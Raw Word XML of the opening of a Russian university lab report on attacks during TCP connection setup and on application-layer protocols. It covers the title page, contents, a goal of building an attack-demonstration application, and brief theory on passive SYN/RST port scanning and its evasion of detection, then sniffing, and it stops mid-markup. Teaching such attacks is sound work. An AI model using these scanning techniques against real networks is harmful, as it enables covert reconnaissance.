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0B93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BDDE8DC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B3B0D53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37AF4FC" w14:textId="77777777" w:rsidR="00C66F52" w:rsidRDefault="00D22796">
      <w:pPr>
        <w:pStyle w:val="1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F151420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16B212C1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488624CB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5D3E5FCD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3CEE366E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19AAF693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4EC22C5C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0A2C9FCA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6CFABE1B" w14:textId="77777777" w:rsidR="00C66F52" w:rsidRDefault="00C66F52">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A5BF4B6" w14:textId="77777777" w:rsidR="00C66F52" w:rsidRPr="00596A88" w:rsidRDefault="00565CAF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4B50C9" w:rsidRPr="00596A88">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C7E154" w14:textId="77777777" w:rsidR="00C66F52" w:rsidRDefault="00C66F52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31C2CFA" w14:textId="77777777" w:rsidR="00C66F52" w:rsidRDefault="00D2279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EF0232">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="004B50C9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Атаки при установке </w:t>
      </w:r>
      <w:r w:rsidR="004B50C9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidR="004B50C9" w:rsidRPr="00596A88">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="004B50C9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>соединения и протоколов прикладного уровня</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF66E60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6AF546DE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EACA55D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2050BE39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49E5797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9930F40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79BCEA74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F7B6D08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D12C6B7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745E2927" w14:textId="77777777" w:rsidR="00C66F52" w:rsidRDefault="00C66F52">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B5DB2BB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349E89A0" w14:textId="77777777" w:rsidR="00C66F52" w:rsidRDefault="00D22796">
      <w:pPr>
        <w:pStyle w:val="10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1282DC" w14:textId="77777777" w:rsidR="00C66F52" w:rsidRPr="00596A88" w:rsidRDefault="004A67CD">
      <w:pPr>
        <w:pStyle w:val="10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095B94"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14:paraId="7E33138D" w14:textId="7A3C2B91" w:rsidR="00C66F52" w:rsidRDefault="00596A88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D22796">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.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25A47">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0881FC11" w14:textId="77777777" w:rsidR="00EF0232" w:rsidRDefault="00EF0232">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DAFC4C1" w14:textId="77777777"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B1C233D" w14:textId="77777777" w:rsidR="00C66F52" w:rsidRDefault="00EF0232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Протько М.И.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6180B034" w14:textId="77777777" w:rsidR="00C66F52" w:rsidRDefault="00C66F52">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20F49AF3" w14:textId="77777777" w:rsidR="00C66F52" w:rsidRDefault="00C66F52">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62E930DF" w14:textId="77777777" w:rsidR="00C66F52" w:rsidRDefault="00C66F52">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2704B7A0" w14:textId="77777777" w:rsidR="00C66F52" w:rsidRDefault="00C66F52">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B053C14" w14:textId="77777777" w:rsidR="00C66F52" w:rsidRDefault="00C66F52">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12DECBFF" w14:textId="77777777" w:rsidR="00C66F52" w:rsidRDefault="00C66F52">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0844AB84" w14:textId="77777777" w:rsidR="00C66F52" w:rsidRDefault="00C66F52">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D748B11" w14:textId="77777777" w:rsidR="00C66F52" w:rsidRDefault="00C66F52">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B07FA26" w14:textId="77777777" w:rsidR="00C66F52" w:rsidRDefault="00C66F52">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C1437A8" w14:textId="77777777" w:rsidR="00C66F52" w:rsidRDefault="00057DBB">
      <w:pPr>
        <w:pStyle w:val="1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2872E8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA7F62F" w14:textId="77777777" w:rsidR="003C6420" w:rsidRDefault="003C6420">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:left="2832" w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C9C2DDC" w14:textId="77777777" w:rsidR="00D22796" w:rsidRDefault="00D22796">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:left="2832" w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E982106" w14:textId="77777777" w:rsidR="002872E8" w:rsidRPr="00DB3A38" w:rsidRDefault="002872E8" w:rsidP="002872E8">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:left="2832" w:firstLine="708"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB3A38">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32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14:paraId="4D379D53" w14:textId="77777777" w:rsidR="00085EF1" w:rsidRDefault="002872E8">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="440"/>
              <w:tab w:val="right" w:pos="9345"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00F05967">
            <w:rPr>
              <w:i/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00F05967">
            <w:rPr>
              <w:i/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \h \u \z </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00F05967">
            <w:rPr>
              <w:i/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc65156180" w:history="1">
            <w:r w:rsidR="00085EF1" w:rsidRPr="004144C2">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r w:rsidR="00C8593A">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00085EF1" w:rsidRPr="004144C2">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Цель работы</w:t>
            </w:r>
            <w:r w:rsidR="00085EF1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00085EF1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00085EF1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc65156180 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00085EF1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00085EF1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00085EF1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00085EF1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="699B5131" w14:textId="77777777" w:rsidR="00085EF1" w:rsidRDefault="00146D6E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65156181" w:history="1">
            <w:r w:rsidR="00085EF1" w:rsidRPr="004144C2">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>2. Краткие теоретические сведения</w:t>
            </w:r>
            <w:r w:rsidR="00085EF1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00085EF1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00085EF1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc65156181 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00085EF1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00085EF1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00085EF1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00085EF1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0686AF0E" w14:textId="77777777" w:rsidR="00085EF1" w:rsidRDefault="00146D6E" w:rsidP="00085EF1">
          <w:pPr>
            <w:pStyle w:val="20"/>
            <w:tabs>
              <w:tab w:val="righ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65156182" w:history="1">
            <w:r w:rsidR="00085EF1" w:rsidRPr="004144C2">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3. Реализация задачи</w:t>
            </w:r>
            <w:r w:rsidR="00085EF1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="009C2100">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="77F64EED" w14:textId="77777777" w:rsidR="00085EF1" w:rsidRDefault="00146D6E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65156183" w:history="1">
            <w:r w:rsidR="00085EF1" w:rsidRPr="004144C2">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Приложение. Текст программ</w:t>
            </w:r>
            <w:r w:rsidR="00085EF1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00172782">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3F3EC5B2" w14:textId="77777777" w:rsidR="00C66F52" w:rsidRDefault="002872E8" w:rsidP="002872E8">
          <w:pPr>
            <w:pStyle w:val="10"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9359"/>
            </w:tabs>
            <w:spacing w:before="200" w:after="80"/>
            <w:rPr>
              <w:b/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00F05967">
            <w:rPr>
              <w:i/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="66331135" w14:textId="77777777" w:rsidR="00C66F52" w:rsidRDefault="00C66F52">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50280C66" w14:textId="77777777" w:rsidR="00C66F52" w:rsidRDefault="00D22796">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_gjdgxs" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B707F58" w14:textId="77777777" w:rsidR="002872E8" w:rsidRDefault="002872E8" w:rsidP="002872E8">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_k5vdaq8hmnxz" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="2" w:name="_Toc65156180"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidRPr="00F05967">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Цель работы</w:t>
      </w:r>
      <w:bookmarkStart w:id="3" w:name="_4tmhuckkk5kv" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="15D22817" w14:textId="77777777" w:rsidR="00565CAF" w:rsidRDefault="00565CAF" w:rsidP="00565CAF">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A58BB05" w14:textId="77777777" w:rsidR="00565CAF" w:rsidRDefault="00565CAF" w:rsidP="00565CAF">
      <w:pPr>
        <w:pStyle w:val="10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Изучить теоретические сведения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790B7F49" w14:textId="77777777" w:rsidR="00565CAF" w:rsidRDefault="00565CAF" w:rsidP="00565CAF">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="491F16DE" w14:textId="77777777" w:rsidR="004B50C9" w:rsidRDefault="004B50C9" w:rsidP="004B50C9">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_30j0zll" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Создать приложение, реализующее атаки на протокол при установке </w:t>
      </w:r>
      <w:r w:rsidRPr="004B50C9">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="00596A88">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>соединения и в рамках заданного протокола прикладного уровня. В интерфейсе приложения должны быть наглядно представлены</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BD2C86" w14:textId="77777777" w:rsidR="00565CAF" w:rsidRDefault="004B50C9" w:rsidP="004B50C9">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C61DD69" w14:textId="77777777" w:rsidR="00565CAF" w:rsidRPr="00596A88" w:rsidRDefault="00565CAF" w:rsidP="00565CAF">
      <w:pPr>
        <w:pStyle w:val="10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Исходные данные протокола (модули, ключи, секретные данные и т.п.)</w:t>
      </w:r>
      <w:r w:rsidR="004B50C9" w:rsidRPr="00596A88">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7177B89E" w14:textId="77777777" w:rsidR="00565CAF" w:rsidRPr="00596A88" w:rsidRDefault="00565CAF" w:rsidP="00565CAF">
      <w:pPr>
        <w:pStyle w:val="10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Данные, передаваемые по сети каждой из сторон</w:t>
      </w:r>
      <w:r w:rsidR="004B50C9" w:rsidRPr="00596A88">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F27D70" w14:textId="77777777" w:rsidR="00565CAF" w:rsidRPr="004B50C9" w:rsidRDefault="00565CAF" w:rsidP="00565CAF">
      <w:pPr>
        <w:pStyle w:val="10"/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sz w:val="28"/>
        </w:rPr>
        <w:t>Проверки, выполняемые каждым из участников.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C2E4DD" w14:textId="77777777" w:rsidR="004B50C9" w:rsidRDefault="004B50C9" w:rsidP="004B50C9">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34D2CE73" w14:textId="77777777" w:rsidR="000E3023" w:rsidRPr="00565CAF" w:rsidRDefault="000E3023" w:rsidP="000E3023">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1646D54A" w14:textId="77777777" w:rsidR="002872E8" w:rsidRDefault="00565CAF" w:rsidP="00565CAF">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00565CAF">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Процесс взаимодействия между сторонами протокола может быть реализован при помощи буферных переменных. Также необходимо выделить каждый из этапов </w:t>
      </w:r>
      <w:r w:rsidR="004B50C9">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>атака для того, чтобы его можно было отделить от остальных</w:t>
      </w:r>
      <w:r w:rsidRPr="00565CAF">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3671449C" w14:textId="77777777" w:rsidR="002872E8" w:rsidRDefault="002872E8" w:rsidP="002872E8">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3261EE83" w14:textId="77777777" w:rsidR="002872E8" w:rsidRDefault="002872E8" w:rsidP="002872E8">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F05967">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:bookmarkStart w:id="5" w:name="_Toc65156181"/>
      <w:r w:rsidR="00EF0232">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Краткие теоретические сведения</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="7207E942" w14:textId="77777777" w:rsidR="004B4A36" w:rsidRPr="00596A88" w:rsidRDefault="004B4A36" w:rsidP="004B4A36">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00172782" w:rsidRPr="00596A88">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00172782" w:rsidRPr="00596A88">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Passive </w:t>
      </w:r>
      <w:r w:rsidRPr="004B4A36">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00172782">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00596A88">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B4A36">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>пассивное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сканирование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портов</w:t>
      </w:r>
      <w:r w:rsidR="00172782" w:rsidRPr="00596A88">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>SYNc-(SYNs-ACKc)-RSTc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">  и  </w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>SYNc-RSTs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="004B4A36">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>При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д</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>остаточно</w:t>
      </w:r>
      <w:r w:rsidR="00172782" w:rsidRPr="00596A88">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>умном</w:t>
      </w:r>
      <w:r w:rsidR="00172782" w:rsidRPr="00596A88">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>поведении</w:t>
      </w:r>
      <w:r w:rsidR="00172782" w:rsidRPr="00596A88">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">сканера </w:t>
      </w:r>
      <w:r w:rsidRPr="004B4A36">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>(например,  сканирование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с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низкой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скоростью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или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проверка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лишь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конкретных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портов)    детектировать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пассивное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сканирование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невозможно,   поскольку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оно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ничем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не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отличается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от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обычных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попыток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установить</w:t>
      </w:r>
      <w:r w:rsidR="00172782" w:rsidRPr="00596A88">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B4A36">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>соединение</w:t>
      </w:r>
      <w:r w:rsidR="00172782" w:rsidRPr="00596A88">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348C88BB" w14:textId="77777777" w:rsidR="00172782" w:rsidRPr="00596A88" w:rsidRDefault="00172782" w:rsidP="004B4A36">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00596A88">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E663C3D" w14:textId="77777777" w:rsidR="00172782" w:rsidRDefault="00172782" w:rsidP="004B4A36">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00596A88">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sniffing</w:t>
      </w:r>
      <w:r w:rsidRPr="00596A88">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>атака заключается в перехвате и анализе сетевого потока</w:t>
      </w:r>
      <w:r w:rsidRPr="00596A88">
        <w:rPr>
